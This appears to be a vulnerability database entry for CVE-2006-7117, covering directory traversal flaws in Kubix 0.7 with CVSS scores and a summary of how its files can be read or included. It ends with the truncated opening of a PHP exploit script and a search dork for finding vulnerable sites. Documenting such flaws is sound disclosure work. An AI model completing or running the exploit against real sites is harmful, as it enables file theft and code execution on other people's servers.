6.8
CVSSv2

CVE-2006-7117

Published: 06/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple directory traversal vulnerabilities in Kubix 0.7 and previous versions allow remote malicious users to (1) include and execute arbitrary local files via ".." sequences in the theme cookie to index.php, which is not properly handled by includes/head.php; and (2) read arbitrary files via ".." sequences in the file parameter in an add_dl action to adm_index.php, as demonstrated by reading connect.php.

Vulnerable Product Search on Vulmon Subscribe to Product

kubix kubix

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "\r\n"; echo "Kubix <=07 Multiple Vulnerabilities Exploit\r\n"; echo "Site: wwwkubixprojectnet\r\n"; echo "Dork: Powered by: Kubix\r\n"; echo "by BlackHawk <hawkgotyou@gmailcom>\r\n"; echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n"; if ($argc<4) { echo "U ...